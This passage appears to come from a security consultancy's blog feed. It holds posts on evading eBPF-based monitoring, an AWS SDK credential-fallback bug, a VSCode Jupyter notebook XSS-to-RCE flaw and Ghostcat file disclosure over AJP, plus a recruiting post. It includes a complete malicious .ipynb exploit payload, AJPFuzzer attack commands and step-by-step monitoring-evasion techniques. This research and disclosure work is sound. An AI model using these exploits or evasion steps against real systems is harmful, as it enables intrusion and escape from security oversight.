By way of example, a simple monitoring solution could decide to hook only the execve system call. Contrary to popular belief, multiple ELF-based Unix-like kernels don’t need a file on disk to load and run code, even if they usually require one. One way to achieve this is by using a technique called reflective loading. Reflective loading is an important post-exploitation technique usually used to avoid detection and execute more complex tools in locked-down environments. The man page for execve() states: “execve() executes the program pointed to by filename…”, and goes on to say that “the text, data, bss, and stack of the calling process are overwritten by that of the program loaded”. This overwriting doesn’t necessarily constitute something that the Linux kernel must have a monopoly over, unlike filesystem access, or any number of other things. Because of this, the execve() system call can be mimicked in userland with a minimal difficulty. Creating a new process image is therefore a simple matter of:

  • cleaning out the address space;
  • checking for, and loading, the dynamic linker;
  • loading the binary;
  • initializing the stack;
  • determining the entry point and
  • transferring control of execution.

By following these six steps, a new process image can be created and run. Since this technique was initially reported in 2004, the process has nowadays been pioneered and streamlined by OTS post-exploitation tools. As anticipated, an eBPF program hooking execve would not be able to catch this, since this custom userland exec would effectively replace the existing process image within the current address space with a new one. In this, userland exec mimics the behavior of the system call execve(). However, because it operates in userland, the kernel process structures which describe the process image remain unchanged.

Other system calls may go unmonitored and decrease the detection capabilities of the monitoring solution. Some of these are clone, fork, vfork, creat, or execveat.

Another potential bypass may be present if the BPF program is naive and trusts the execve syscall argument referencing the complete path of the file that is being executed. An attacker could create symbolic links of Unix binaries in different locations and execute them - thus tampering with the logs.

1.2 Network bypasses

Not hooking all the network-related syscalls can have its own set of problems. Some monitoring solutions may only want to hook the EGRESS traffic, while an attacker could still send data to a non-allowed host abusing other network-sensitive operations (see aa_ops at linux/security/apparmor/include/audit.h:78) related to INGRESS traffic:

  • OP_BIND, the bind() function shall assign a local socket address to a socket identified by descriptor socket that has no local socket address assigned.
  • OP_LISTEN, the listen() function shall mark a connection-mode socket, specified by the socket argument, as accepting connections.
  • OP_ACCEPT, the accept() function shall extract the first connection on the queue of pending connections, create a new socket with the same socket type protocol and address family as the specified socket, and allocate a new file descriptor for that socket.
  • OP_RECVMSG, the recvmsg() function shall receive a message from a connection-mode or connectionless-mode socket.
  • OP_SETSOCKOPT, the setsockopt() function shall set the option specified by the option_name argument, at the protocol level specified by the level argument, to the value pointed to by the option_value argument for the socket associated with the file descriptor specified by the socket argument. Interesting options for attackers are SO_BROADCAST, SO_REUSEADDR, SO_DONTROUTE.

Generally, the network monitoring should look at all socket-based operations similarly to AppArmor.

In case the same local user has mixed monitored and unmonitored console sessions, it could be possible for an attacker in a monitored session to leverage open file descriptors and sockets to send data to restricted hosts. In 2020 some versions of Linux kernels had introduced a new system call to achieve this called pidfd_getfd. A small number of operating systems (like Ubuntu) implement the Yama kernel module that limit file descriptor access to only child-parent processes. A PoC code for using this function is available on Github (TheZ3ro/fdstealer).

File descriptor stealing using pidfd_getfd

2. Delayed execution

If only active console sessions are monitored, eBPF programs may only live for the time span of the session. By delaying the execution of a command (through sleep, timeout, sar, vmstat, inotifywait, at, cron …) and quitting the session, it could be possible to completely evade the solution.

3. Evade scoped event monitoring based on cgroup

A security monitoring solution may only be interested in auditing a specific user or cgroup (such in the context of a remote console session). Taking Teleport as an example, it achieves this by correlating every event to a session with control groups (cgroupv2 in particular). Control grouping is a Linux kernel feature to limit access to resources to a group of processes. It is used in many containerization technologies (behind the scenes Docker creates a set of namespaces and control groups for the container) and its peculiarity is that all child processes will keep the id of the parent process. When Teleport starts an SSH session, it first re-launches itself and places itself within a cgroup. This allows not only that process, but all future processes that Teleport launches, to be tracked with a unique ID. The BPF programs that Teleport runs have been updated to also emit the cgroup ID of the program executing them. The BPF script checks the value returned by bpf_get_current_cgroup_id() and only cares about the important session cgroup. The simplest evasion to this auditing strategy would be changing your cgroup ID, but an attacker needs to be root to achieve this. Meddling with the cgroupv2 pseudo file system or abusing PAM configuration are also potential opportunities to affect the cgroup/session correlation.

Another technique involves being reallocated by init. In the case of Teleport, when the bash process spawned by the session dies, its child processes become orphans and the Teleport process terminates its execution. When a child process becomes an orphan, it can be assigned to a different cgroup by the operating system under certain conditions (not having a tty, being a process group leader, joining a new process session). This allows an attacker to bypass the restrictions in place. The following PoC is an example of a bypass for this design:

  1. Open a new eBPF-monitored session
  2. Start tmux by executing the tmux command
  3. Detach from tmux by pressing CTRL+B and then D
  4. Kill the bash process that is tmux’s parent
  5. Re-attach to the tmux process by executing tmux attach. The process tree will now look like this:

CGroupV2 evasion PoC

As another attack avenue, leveraging processes run by different local users/cgroupv2 on the machine (abusing other daemons, delegating systemd) can also help an attacker evade this. This aspect obviously depends on the system hosting the monitoring solution. Protecting against this is tricky, since even if PR_SET_CHILD_SUBREAPER is set to ensure that the descendants can’t re-parent themselves to init, if the ancestor reaper dies or is killed (DoS), then processes in that service can escape their cgroup “container”. Any compromise of this privileged service process (or malfeasance by it) allows it to kill its hierarchy manager process and escape all control.

4. Memory limits and loss of events

BPF programs have a lot of constraints. Only 512 bytes of stack space are reserved for the eBPF program. Variables will get hoisted and instantiated at the start of execution, and if the script tries to dump syscall arguments or pt-regs, it will run out of stack space very quickly. If no workaround on the instruction limit is set, it could be possible to push the script into retrieving something too big to ever fit on the stack, losing visibility very soon when the execution gets complicated. But even when workarounds are used (e.g., when using multiple probes to trace the same events but capture different data, or split your code into multiple programs that call each other using a program map) there still may be a chance to abuse it. BPF programs are not meant to be run forever, but they have to stop at some point. By way of example, if a monitoring solution is running on CentOS 7 and trying to capture a process arguments and its environment variables, the emitted event could have too many argv and too many envp. Even in that case, you may miss some of them because the loop stops earlier. In these cases, the event data will be truncated. It’s important to note that these limitations are different based on the kernel where BPF is being run, and how the endpoint agent is written.

Another peculiarity of eBPFs is that they’ll drop events if they can not be consumed fast enough, instead of dragging down the performance of the entire system with it. An attacker could abuse this by generating a sufficient number of events to fill up the perf ringbuffer and overwrite data before the agent can read it.

5. Never trust the userspace

The kernel-space understanding of a pid is not the same as the user-space understanding of a pid. If the eBPF script is trying to identify a file, the right way would be to get the inode number and device number, while a file descriptor won’t be as useful. Even in that case, probes could be subject to TOCTOU issues since they’ll be sending data to user mode that can easily change. If the script is instead tracing syscalls directly (using tracepoint or kprobe) it is probably stuck with file descriptors and it could be possible to obfuscate executions by playing around with the current working directory and file descriptors, (e.g., by combining fchdir, openat, and execveat).

6. Abuse the lack of seccomp-bpf & kernel discrepancies

eBPF-based monitoring solutions should protect themselves by using seccomp-BPF to permanently drop the ability to make the bpf() syscall before spawning a console session. If not, an attacker will have the ability to make the bpf() syscall to unload the eBPF programs used to track execution. Seccomp-BPF uses BPF programs to filter arbitrary system calls and their arguments (constants only, no pointer dereference).

Another thing to keep in mind when working with kernels, is that interfaces aren’t guaranteed to be consistent and stable. An attacker may abuse eBPF programs if they are not run on verified kernel versions. Usually, conditional compilation for a different architecture is very convoluted for these programs and you may find that the variant for your specific kernel is not targeted correctly. One common pitfall of using seccomp-BPF is filtering on system call numbers without checking the seccomp_data->arch BPF program argument. This is because on any architecture that supports multiple system call invocation conventions, the system call numbers may vary based on the specific invocation. If the numbers in the different calling conventions overlap, then checks in the filters may be abused. It is therefore important to ensure that the differences in bpf() invocations for each newly supported architecture are taken into account by the seccomp-BPF filter rules.

7. Interfere with the agents

Similarly to (6), it may be possible to interfere with the eBPF program loading in different ways, such as targeting the eBPF compiler libraries (BCC’s libbcc.so) or adapting other shared libraries preloading methods to tamper with the behavior of legit binaries of the solution, ultimately performing harmful actions. In case an attacker succeeds in altering the solution’s host environment, they can add in front of the LD_LIBRARY_PATH, a directory where they saved a malicious library having the same libbcc.so name and exporting all the symbols used (to avoid a runtime linkage error). When the solution starts, instead of the legit bcc library, it gets linked with the malicious library. Defenses against this may include using statically linked programs, linking the library with the full path, or running the program into a controlled environment.

Many thanks to the whole Teleport Security Team, @FridayOrtiz, @Th3Zer0, & @alessandrogario for the inspiration and feedback while writing this blog post.

The Danger of Falling to System Role in AWS SDK Client

17 October 2022 at 22:00

CloudsecTidbit

Introduction to the series

When it comes to Cloud Security, the first questions usually asked are:

  • How is the infrastructure configured?
  • Are there any public buckets?
  • Are the VPC networks isolated?
  • Does it use proper IAM settings?

As application security engineers, we think that there are more interesting and context-related questions such as:

  • Which services provided by the cloud vendor are used?
  • Among the used services, which ones are directly integrated within the web platform logic?
  • How is the web application using such services?
  • How are they combined to support the internal logic?
  • Is the usage of services ever exposed or reachable by the end-user?
  • Are there any unintended behaviors caused by cloud services within the web platform?

By answering these questions, we usually find bugs.

Today we introduce the “CloudSecTidbits” series to share ideas and knowledge about such questions.

CloudSec Tidbits is a blogpost series showcasing interesting bugs found by Doyensec during cloud security testing activities. We’ll focus on times when the cloud infrastructure is properly configured, but the web application fails to use the services correctly.

Each blogpost will discuss a specific vulnerability resulting from an insecure combination of web and cloud related technologies. Every article will include an Infrastructure as Code (IaC) laboratory that can be easily deployed to experiment with the described vulnerability.

Tidbit # 1 - The Danger of Falling to System Role in AWS SDK Client

Amazon Web Services offers a comprehensive SDK to interact with their cloud services.

Let’s first examine how credentials are configured. The AWS SDKs require users to pass access / secret keys in order to authenticate requests to AWS. Credentials can be specified in different ways, depending on the different use cases.

When the AWS client is initialized without directly providing the credential’s source, the AWS SDK acts using a clearly defined logic. The AWS SDK uses a different credential provider chain depending on the base language. The credential provider chain is an ordered list of sources where the AWS SDK will attempt to fetch credentials from. The first provider in the chain that returns credentials without an error will be used.

For example, the SDK for the Go language will use the following chain:

  1. 1) Environment variables
  2. 2) Shared credentials file
  3. 3) If the application uses ECS task definition or RunTask API operation, IAM role for tasks
  4. 4) If the application is running on an Amazon EC2 instance, IAM role for Amazon EC2

The code snippet below shows how the SDK retrieves the first valid credential provider:

Source: aws-sdk-go/aws/credentials/chain_provider.go

// Retrieve returns the credentials value or error if no provider returned
// without error.
//
// If a provider is found it will be cached and any calls to IsExpired()
// will return the expired state of the cached provider.
func (c *ChainProvider) Retrieve() (Value, error) {
	var errs []error
	for _, p := range c.Providers {
		creds, err := p.Retrieve()
		if err == nil {
			c.curr = p
			return creds, nil
		}
		errs = append(errs, err)
	}
	c.curr = nil

	var err error
	err = ErrNoValidProvidersFoundInChain
	if c.VerboseErrors {
		err = awserr.NewBatchError("NoCredentialProviders", "no valid providers in chain", errs)
	}
	return Value{}, err
}

After that first look at AWS SDK credentials, we can jump straight to the tidbit case.

Insecure AWS SDK Client Initialization In User Facing Functionalities - The Import From S3 Case

By testing several web platforms, we noticed that data import from external cloud services is an often recurring functionality. For example, some web platforms allow data import from third-party cloud storage services (e.g., AWS S3).

In this specific case, we will focus on a vulnerability identified in a web application that was using the AWS SDK for Go (v1) to implement an “Import Data From S3” functionality.

The user was able to make the platform fetch data from S3 by providing the following inputs:

  • S3 bucket name - Import from public source case;

    OR

  • S3 bucket name + AWS Credentials - Import from private source case;

The code paths were handled by a function similar to the following structure:

func getObjectsList(session *Session, config *aws.Config, bucket_name string){

	//initilize or re-initilize the S3 client
	S3svc := s3.New(session, config)

	objectsList, err := S3svc.ListObjectsV2(&s3.ListObjectsV2Input{
			Bucket:  bucket_name
	})

	return objectsList, err
}

func importData(req *http.Request) (success bool) {

	srcConfig := &aws.Config{
		Region: &config.Config.AWS.Region,
	}

	req.ParseForm()
	bucket_name := req.Form.Get("bucket_name")
	accessKey := req.Form.Get("access_key")
	secretKey := req.Form.Get("secret_key")
	region := req.Form.Get("region")

	session_init, err := session.NewSession()
	if err != nil {
		return err, nil
	}

	aws_config = &aws.Config{
		Region: region,
	}

	if len(accessKey) > 0 {
		aws_config.Credentials = credentials.NewStaticCredentials(accessKey, secretKey, "")
	} else {
		aws_config.Credentials = credentials.AnonymousCredentials
	}

	objectList, err := getObjectsList(session_init, aws_config, bucket_name)
    
...

Despite using credentials.AnonymousCredentials when the user was not providing keys, the function had an interesting code path when ListObjectsV2 returned errors:

...
if err != nil {
		if err, awsError := err.(awserr.Error); awsError {
			aws_config.credentials = nil
			getObjectsList(session_init, aws_config, bucket_name)
		}
}

The error handling was setting aws_config.credentials = nil and trying again to list the objects in the bucket.

Looking at aws_config.credentials = nil

Under those circumstances, the credentials provider chain will be used and eventually the instance’s IAM role will be assumed. In our case, the automatically retrieved credentials had full access to internal S3 buckets.

The Simple Deduction

If internal S3 bucket names are exposed to the end-user by the platform (e.g., via network traffic), the user can use them as input for the “import from S3” functionality and inspect their content directly in the UI.

Reading internal bucket names list extracted from Burp Suite history

In fact, it is not uncommon to see internal bucket names in an application’s traffic as they are often used for internal data processing. In conclusion, providing internal bucket names resulted in them being fetched from the import functionality and added to the platform user’s data.

Different Client Credentials Initialization, Different Outcomes

AWS SDK clients require a Session object containing a Credential object for the initialization.

Described below are the three main ways to set the credentials needed by the client:

NewStaticCredentials

Within the credentials package, the NewStaticCredentials function returns a pointer to a new Credentials object wrapping static credentials.

Client initialization example with NewStaticCredentials:

package testing

import (
	"time"

	"github.com/aws/aws-sdk-go/aws"
	"github.com/aws/aws-sdk-go/aws/credentials"
	"github.com/aws/aws-sdk-go/aws/session"
)

var session = session.Must(session.NewSession(&aws.Config{
	Credentials: credentials.NewStaticCredentials("AKIA….", "Secret", "Session"),
	Region:      aws.String("us-east-1"),
}))

Note: The credentials should not be hardcoded in code. Instead retrieve them from a secure vault at runtime.

{ nil | Unspecified } Credentials Object

If the session client is initialized without specifying a credential object, the credential provider chain will be used. Likewise, if the Credentials object is directly initialized to nil, the same behavior will occur.

Client initialization example without Credential object:

svc := s3.New(session.Must(session.NewSession(&aws.Config{
		Region:      aws.String("us-west-2"),
})))

Client initialization example with a nil valued Credential object:

svc := s3.New(session.Must(session.NewSession(&aws.Config{
		Credentials: <nil_object>,
		Region:      aws.String("us-west-2"),
})))

Outcome: Both initialization methods will result in relying on the credential provider chain. Hence, the credentials (probably very privileged) retrieved from the chain will be used. As shown in the aforementioned “Import From S3” case study, not being aware of such behavior led to the exfiltration of internal buckets.

AnonymousCredentials

The right function for the right tasks ;)

AWS SDK for Go API Reference is here to help:

“AnonymousCredentials is an empty Credential object that can be used as dummy placeholder credentials for requests that do not need to be signed. This AnonymousCredentials object can be used to configure a service not to sign requests when making service API calls. For example, when accessing public S3 buckets.”

svc := s3.New(session.Must(session.NewSession(&aws.Config{
  Credentials: credentials.AnonymousCredentials,
})))
// Access public S3 buckets.

Basically, the AnonymousCredentials object is just an empty Credential object:

// source: https://github.com/aws/aws-sdk-go/blob/main/aws/credentials/credentials.go#L60

// AnonymousCredentials is an empty Credential object that can be used as
// dummy placeholder credentials for requests that do not need to be signed.
//
// These Credentials can be used to configure a service not to sign requests
// when making service API calls. For example, when accessing public
// s3 buckets.
//
//     svc := s3.New(session.Must(session.NewSession(&aws.Config{
//       Credentials: credentials.AnonymousCredentials,
//     })))
//     // Access public S3 buckets.
var AnonymousCredentials = NewStaticCredentials("", "", "")

For cloud security auditors

The vulnerability could be also found in the usage of other AWS services.

While auditing cloud-driven web platforms, look for every code path involving an AWS SDK client initialization.

For every code path answer the following questions:

  1. Is the code path directly reachable from an end-user input point (feature or exposed API)?

    e.g., AWS credentials taken from the user settings page within the platform or a user submits an AWS public resource to have it fetched/modified by the platform.

  2. How are the client’s credentials initialized?

    • credential provider chain - Look for the machine owned role in the chain
      • Is there a fall-back condition? Look if the end-user can reach that code path with some inputs. If it is used by default, go on - Look for the role’s permissions
    • aws.Config structure as input parameter - Look for the passed role’s permissions
  3. Can users abuse the functionality to make the platform use the privileged credentials on their behalf and point to private resources within the AWS account?

    e.g., “import from S3” functionality abused to import the infrastructure’s private buckets

For developers

Use the AnonymousAWSCredentials to configure the AWS SDK client when dealing with public resources.

From the official AWS documentations:

Using anonymous credentials will result in requests not being signed before sending them to the service. Any service that does not accept unsigned requests will return a service exception in this case.

In case of user provided credentials being used to integrate with other cloud services, the platform should avoid implementing fall-back to system role patterns. Ensure that the user provided credentials are correctly set to avoid ending up with aws.Config.Credentials = nil because it would result in the client using the credentials provider chain → System role.

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/

Stay tuned for the next episode!

Visual Studio Code Jupyter Notebook RCE

26 October 2022 at 22:00

I spared a few hours over the past weekend to look into the exploitation of this Visual Studio Code .ipynb Jupyter Notebook bug discovered by Justin Steven in August 2021.

Justin discovered a Cross-Site Scripting (XSS) vulnerability affecting the VSCode built-in support for Jupyter Notebook (.ipynb) files.

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src=x onerror='console.log(1)'>"}
        }
      ]
    }
  ]
}

His analysis details the issue and shows a proof of concept which reads arbitrary files from disk and then leaks their contents to a remote server, however it is not a complete RCE exploit.

I could not find a way to leverage this XSS primitive to achieve arbitrary code execution, but someone more skilled with Electron exploitation may be able to do so. […]

Given our focus on ElectronJs (and many other web technologies), I decided to look into potential exploitation venues.

As the first step, I took a look at the overall design of the application in order to identify the configuration of each BrowserWindow/BrowserView/Webview in use by VScode. Facilitated by ElectroNG, it is possible to observe that the application uses a single BrowserWindow with nodeIntegration:on.

ElectroNG VScode

This BrowserWindow loads content using the vscode-file protocol, which is similar to the file protocol. Unfortunately, our injection occurs in a nested sandboxed iframe as shown in the following diagram:

VScode BrowserWindow Design

In particular, our sandbox iframe is created using the following attributes:

allow-scripts allow-same-origin allow-forms allow-pointer-lock allow-downloads

By default, sandbox makes the browser treat the iframe as if it was coming from another origin, even if its src points to the same site. Thanks to the allow-same-origin attribute, this limitation is lifted. As long as the content loaded within the webview is also hosted on the local filesystem (within the app folder), we can access the top window. With that, we can simply execute code using something like top.require('child_process').exec('open /System/Applications/Calculator.app');

So, how do we place our arbitrary HTML/JS content within the application install folder?

Alternatively, can we reference resources outside that folder?

The answer comes from a recent presentation I watched at the latest Black Hat USA 2022 briefings. In exploiting CVE-2021-43908, TheGrandPew and s1r1us use a path traversal to load arbitrary files outside of VSCode installation path.

vscode-file://vscode-app/Applications/Visual Studio Code.app/Contents/Resources/app/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/somefile.html

Similarly to their exploit, we can attempt to leverage a postMessage’s reply to leak the path of current user directory. In fact, our payload can be placed inside the malicious repository, together with the Jupyter Notebook file that triggers the XSS.

After a couple of hours of trial-and-error, I discovered that we can obtain a reference of the img tag triggering the XSS by forcing the execution during the onload event.

Path Leak VScode

With that, all of the ingredients are ready and I can finally assemble the final exploit.

var apploc = '/Applications/Visual Studio Code.app/Contents/Resources/app/'.replace(/ /g, '%20');
var repoloc;
window.top.frames[0].onmessage = event => {
    if(event.data.args.contents && event.data.args.contents.includes('<base href')){  
        var leakloc = event.data.args.contents.match('<base href=\"(.*)\"')[1];
        var repoloc = leakloc.replace('https://file%2B.vscode-resource.vscode-webview.net','vscode-file://vscode-app'+apploc+'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..');
        setTimeout(async()=>console.log(repoloc+'poc.html'), 3000)
        location.href=repoloc+'poc.html';
    }
};
window.top.postMessage({target: window.location.href.split('/')[2],channel: 'do-reload'}, '*');

To deliver this payload inside the .ipynb file we still need to overcome one last limitation: the current implementation results in a malformed JSON. The injection happens within a JSON file (double-quoted) and our Javascript payload contains quoted strings as well as double-quotes used as a delimiter for the regular expression that is extracting the path.

After a bit of tinkering, the easiest solution involves the backtick ` character instead of the quote for all JS strings.

The final pocimg.ipynb file looks like:

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src='a445fff1d9fd4f3fb97b75202282c992.png' onload='var apploc = `/Applications/Visual Studio Code.app/Contents/Resources/app/`.replace(/ /g, `%20`);var repoloc;window.top.frames[0].onmessage = event => {if(event.data.args.contents && event.data.args.contents.includes(`<base href`)){var leakloc = event.data.args.contents.match(`<base href=\"(.*)\"`)[1];var repoloc = leakloc.replace(`https://file%2B.vscode-resource.vscode-webview.net`,`vscode-file://vscode-app`+apploc+`..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..`);setTimeout(async()=>console.log(repoloc+`poc.html`), 3000);location.href=repoloc+`poc.html`;}};window.top.postMessage({target: window.location.href.split(`/`)[2],channel: `do-reload`}, `*`);'>"}
        }
      ]
    }
  ]
}

By opening a malicious repository with this file, we can finally trigger our code execution.


The built-in Jupyter Notebook extension opts out of the protections given by the Workspace Trust feature introduced in Visual Studio Code 1.57, hence no further user interaction is required. For the record, this issue was fixed in VScode 1.59.1 and Microsoft assigned CVE-2021-26437 to it.

Recruiting Security Researchers Remotely

8 November 2022 at 23:00

At Doyensec, the application security engineer recruitment process is 100% remote. As the final step, we used to organize an onsite interview in Warsaw for candidates from Europe and in New York for candidates from the US. It was like that until 2020, when the Covid pandemic forced us to switch to a 100% remote recruitment model and hire people without meeting them in person.

Banner Recruiting Post

We have conducted recruitment interviews with candidates from over 25 countries. So how did we build a process that, on the one hand, is inclusive for people of different nationalities and cultures, and on the other hand, allows us to understand the technical skills of a given candidate?

The recruitment process below is the result of the experience gathered since 2018.

Introduction Call

Before we start the recruitment process of a given candidate, we want to get to know someone better. We want to understand their motivations for changing the workplace as well as what they want to do in the next few years. Doyensec only employs people with a specific mindset, so it is crucial for us to get to know someone before asking them to present their technical skills.

During our initial conversation, our HR specialist will tell a candidate more about the company, how we work, where our clients come from and the general principles of cooperation with us. We will also leave time for the candidate so that they can ask any questions they want.

What do we pay attention to during the introduction call?

  • Knowledge of the English language for applicants who are not native speakers
  • Professionalism - although people come from different cultures, professionalism is international
  • Professional experience that indicates the candidate has the background to be successful in the relevant role with us
  • General character traits that can tell us if someone will fit in well with our team

If the financial expectations of the candidate are in line with what we can offer and we feel good about the candidate, we will proceed to the first technical skills test.

Source Code Challenge

At Doyensec, we frequently deal with source code that is provided by our clients. We like to combine source code analysis with dynamic testing. We believe this combination will bring the highest ROI to our customers. This is why we require each candidate to be able to analyze application source code.

Our source code challenge is arranged such that, at the agreed time, we send an archive of source code to the candidate and ask them to find as many vulnerabilities as possible within 2 hours. They are also asked to prepare short descriptions of these vulnerabilities according to the instructions that we send along with the challenge. The aim of this assignment is to understand how well the candidate can analyze the source code and also how efficiently they can work under time pressure.

We do not reveal in advance what programming languages are in our tests, but they should expect the more popular ones. We don’t test on niche languages as our goal is to check if they are able to find vulnerabilities in real-world code, not to try to stump them with trivia or esoteric challenges.

We feel nothing beats real-world experience in coding and reviewing code for vulnerabilities. Beyond that, examples of the academic knowledge necessary to pass our code review challenge is similar (but not limited) to what you’d find in the following resources:

Technical Interview

After analyzing the results of the first challenge, we decide whether to invite the candidate to the first technical interview. The interview is usually conducted by our Consulting Director or one of the more experienced consultants.

The interview will last about 45 minutes where we will ask questions that will help us understand the candidates’ skillsets and determine their level of seniority. During this conversation, we will also ask about mistakes made during the source code challenge. We want to understand why someone may have reported a vulnerability when it is not there or perhaps why someone missed a particular, easy to detect vulnerability.

We also encourage candidates to ask questions about how we work, what tools and techniques we use and anything else that may interest the candidate.

The knowledge necessary to be successful in this phase of the process comes from real-world experience, coupled with academic knowledge from sources such as these:

Web Challenge

At four hours in length, our Web Challenge is our last and longest test of technical skills. At an agreed upon time, we send the candidate a link to a web application that contains a certain number of vulnerabilities and the candidate’s task is to find as many vulnerabilities as possible and prepare a simplified report. Unlike the previous technical challenge where we checked the ability to read the source code, this is a 100% blackbox test.

We recommend candidates to feel comfortable with topics similar to those covered at the Portswigger Web Security Academy, or the training/CTFs available through sites such as HackerOne, prior attempting this challenge.

If the candidate passes this stage of the recruitment process, they will only have one last stage, an interview with the founders of the company.

Final Interview

The last stage of recruitment isn’t so much an interview but rather, more of a summary of the entire process. We want to talk to the candidate about their strengths, better understand their technical weaknesses and any mistakes they made during the previous steps in the process. In particular, we always like to distinguish errors that come from the lack of knowledge versus the result of time pressure. It’s a very positive sign when candidates who reach this stage have reflected upon the process and taken steps to improve in any areas they felt less comfortable with.

The last interview is always carried out by one of the founders of the company, so it’s a great opportunity to learn more about Doyensec. If someone reaches this stage of the recruitment process, it is highly likely that our company will make them an offer. Our offers are based on their expectations as well as what value they bring to the organization. The entire recruitment process is meant to guarantee that the employee will be satisfied with the work and meet the high standards Doyensec has for its team.

The entire recruitment process takes about 8 hours of actual time, which is only one working day, total. So, if the candidate is reactive, the entire recruitment process can usually be completed in about 2 weeks or less.

If you are looking for more information about working @Doyensec, visit our career page and check out our job openings.

Summary Recruiting Process

Let's speak AJP

14 November 2022 at 23:00

Introduction

AJP (Apache JServ Protocol) is a binary protocol developed in 1997 with the goal of improving the performance of the traditional HTTP/1.1 protocol especially when proxying HTTP traffic between a web server and a J2EE container. It was originally created to manage efficiently the network throughput while forwarding requests from server A to server B.

A typical use case for this protocol is shown below: AJP schema

During one of my recent research weeks at Doyensec, I studied and analyzed how this protocol works and its implementation within some popular web servers and Java containers. The research also aimed at reproducing the infamous Ghostcat (CVE-2020-1938) vulnerability discovered in Tomcat by Chaitin Tech researchers, and potential discovering other look-alike bugs.

Ghostcat

This vulnerability affected the AJP connector component of the Apache Tomcat Java servlet container, allowing malicious actors to perform local file inclusion from the application root directory. In some circumstances, this issue would allow attackers to perform arbitrary command execution. For more details about Ghostcat, please refer to the following blog post: https://hackmag.com/security/apache-tomcat-rce/

Communicating via AJP

Back in 2017, our own Luca Carettoni developed and released one of the first, if not the first, open source libraries implementing the Apache JServ Protocol version 1.3 (ajp13). With that, he also developed AJPFuzzer. Essentially, this is a rudimental fuzzer that makes it easy to send handcrafted AJP messages, run message mutations, test directory traversals and fuzz on arbitrary elements within the packet.

With minor tuning, AJPFuzzer can be also used to quickly reproduce the GhostCat vulnerability. In fact, we’ve successfully reproduced the attack by sending a crafted forwardrequest request including the javax.servlet.include.servlet_path and javax.servlet.include.path_info Java attributes, as shown below:

$ java -jar ajpfuzzer_v0.7.jar

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

Once connected to the target host, send the malicious ForwardRequest packet message and verify the discosure of the test.xml file:

$ AJPFuzzer/192.168.80.131:8009> forwardrequest 2 "HTTP/1.1" "/" 127.0.0.1 192.168.80.131 192.168.80.131 8009 false "Cookie:test=value" "javax.servlet.include.path_info:/WEB-INF/test.xml,javax.servlet.include.servlet_path:/"


[*] Sending Test Case '(2) forwardrequest'
[*] 2022-10-13 23:02:45.648


... trimmed ...


[*] Received message type 'Send Body Chunk'
[*] Received message description 'Send a chunk of the body from the servlet container to the web server.
Content (HEX):
0x3C68656C6C6F3E646F79656E7365633C2F68656C6C6F3E0A
Content (Ascii):
<hello>doyensec</hello>
'
[*] 2022-10-13 23:02:46.859


00000000 41 42 00 1C 03 00 18 3C 68 65 6C 6C 6F 3E 64 6F AB.....<hello>do
00000010 79 65 6E 73 65 63 3C 2F 68 65 6C 6C 6F 3E 0A 00 yensec</hello>..


[*] Received message type 'End Response'
[*] Received message description 'Marks the end of the response (and thus the request-handling cycle). Reuse? Yes'
[*] 2022-10-13 23:02:46.86

The server AJP connector will receive an AJP message with the following structure:

AJP schema wireshark

The combination of libajp13, AJPFuzzer and the Wireshark AJP13 dissector made it easier to understand the protocol and play with it. For example, another noteworthy test case in AJPFuzzer is named genericfuzz. By using this command, it’s possible to perform fuzzing on arbitrary elements within the AJP request, such as the request attributes name/value, secret, cookies name/value, request URI path and much more:

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

$ AJPFuzzer/192.168.80.131:8009> genericfuzz 2 "HTTP/1.1" "/" "127.0.0.1" "127.0.0.1" "127.0.0.1" 8009 false "Cookie:AAAA=BBBB" "secret:FUZZ" /tmp/listFUZZ.txt

AJP schema fuzz

Takeaways

Web binary protocols are fun to learn and reverse engineer.

For defenders:

  • Do not expose your AJP interfaces in hostile networks. Instead, consider switching to HTTP/2
  • Protect the AJP interface by enabling a shared secret. In this case, the workers must also include a matching value for the secret
❌
❌